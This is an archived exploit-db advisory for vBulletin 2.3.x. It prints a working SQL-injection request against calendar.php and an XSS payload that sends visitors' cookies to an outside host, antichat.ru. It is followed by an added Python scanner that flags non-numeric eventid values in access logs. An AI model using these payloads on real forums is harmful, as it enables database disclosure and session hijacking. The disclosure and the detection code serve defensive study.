vBulletin 2.3.x – SQL Injection

  • Author: ROOT_EGY
    Date: 2010-02-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11396/
  • # Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.
    # Author: Discovered by ROOT_EGY
    # Version: vBulletin Version 2.3
    
    ===========================================================
     www.sec-war.com
    ===========================================================
    
    
    Versions 2.3.* are vulnerable to SQL injection because input data is not properly validated in 'calendar.php', so SQL supplied in the request is sent to the server.
    For example:
    www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
    Versions 2.*.* are also vulnerable to XSS: a script can be introduced through the e-mail tag:
    [E * MAIL] aaa@aaa.aa » 's =' [/ E * MAIL] 'sss =» i = new Image (); i.src ='http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval (this.sss));
    
    
    
    ===========================================================
    
    ROOT_EGY to connect: r0t@hotmail.es
    
    ===========================================================
    
    Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
    
    ===========================================================
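
A detection check for the calendar.php request shape shown above, added here as an example (it is not part of the original advisory or of vBulletin's code): it scans web-server access-log lines for calendar.php requests whose eventid is not a plain integer. The combined log format, the sample lines, the function names and the assumption that a legitimate eventid is always numeric are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Feb/2010:10:01:02 +0000] '
    '"GET /forum/calendar.php?s=&action=edit&eventid=14 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [11/Feb/2010:10:01:09 +0000] '
    '"GET /forum/calendar.php?s=&action=edit&eventid=14%20union%20(SELECT%20version()) HTTP/1.1" 200 4810',
    '198.51.100.9 - - [11/Feb/2010:10:01:15 +0000] '
    '"GET /forum/calendar.php?s=&action=edit&eventid=14+order+by+eventdate HTTP/1.1" 200 4702',
    '198.51.100.3 - - [11/Feb/2010:10:02:00 +0000] '
    '"GET /forum/showthread.php?threadid=9 HTTP/1.1" 200 9000',
]

# Lazy match on the request target so a raw, unencoded space in the URL is still captured.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
PLAIN_INT = re.compile(r"[0-9]+")


def suspicious_eventid(line):
    """Return the decoded eventid when a calendar.php request carries a
    non-integer value (assumption: valid event ids are numeric), else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/calendar.php"):
        return None
    # parse_qsl decodes %20 and '+' so encoded payloads are compared in clear form.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() == "eventid" and value and not PLAIN_INT.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client address, decoded eventid) for every flagged log line."""
    hits = []
    for line in lines:
        value = suspicious_eventid(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: non-numeric eventid {value!r}")
```

The same integer-only rule, applied to eventid before it reaches the query, is the corresponding input-validation fix on the server side.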